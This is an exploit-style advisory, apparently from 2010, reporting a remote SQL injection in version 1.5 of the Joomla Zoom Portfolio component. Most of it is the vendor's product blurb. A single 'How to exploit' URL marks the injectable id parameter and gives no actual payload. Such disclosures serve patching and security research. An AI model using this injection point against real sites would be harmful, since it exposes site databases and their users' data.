46 lines
No EOL
1.6 KiB
Text
46 lines
No EOL
1.6 KiB
Text
---------------------------------------------------------------------------------
|
|
Joomla Component Zoom Portfolio (id) Remote Sql Injection
|
|
---------------------------------------------------------------------------------
|
|
|
|
Author : Chip D3 Bi0s
|
|
Group : LatinHackTeam
|
|
Email & msn : chipdebios@gmail.com
|
|
Date : 23 August 2010
|
|
Critical Lvl : Moderate
|
|
Impact : Exposure of sensitive information
|
|
Where : From Remote
|
|
---------------------------------------------------------------------------
|
|
|
|
Affected software description:
|
|
~~~~~~~~~~~~~~~~~~~~~~~~~~~
|
|
|
|
Application : Zoom Portfolio --Joomla Portfolio Component
|
|
version : 1.5
|
|
Price : $20.00
|
|
Developer : EGBZOOM
|
|
License : GPLv2 or later type : Commercial
|
|
Date Added : 21 August 2010
|
|
Download : http://www.egbzoom.com/joomla-portfolio-component.html
|
|
|
|
Description :
|
|
|
|
Zoom Portfolio enables you to display your portfolio in a "directory listing-like
|
|
presentation" with minimum effort.The Component has features like add category
|
|
add images,settings,add portfolio .Zoom Portfolio includes automatic thumbnail creation,
|
|
captioning, searching and more.It also includes the ability to modify and delete any
|
|
of your existing pages.
|
|
The Zoom Portfolio is an amazing example of what can be done online with your online
|
|
presence. It is directed at artists of all walks of life, it is very easy to install
|
|
and customize, and it is just simply stunning.
|
|
|
|
-------------------------
|
|
|
|
How to exploit
|
|
|
|
http://127.0.0.1/path/index.php?option=com_zoomportfolio&view=portfolio&view=portfolio&id=[sql]
|
|
|
|
-------------------------
|
|
|
|
+++++++++++++++++++++++++++++++++++++++
|
|
[!] Produced in South America
|
|
+++++++++++++++++++++++++++++++++++++++ |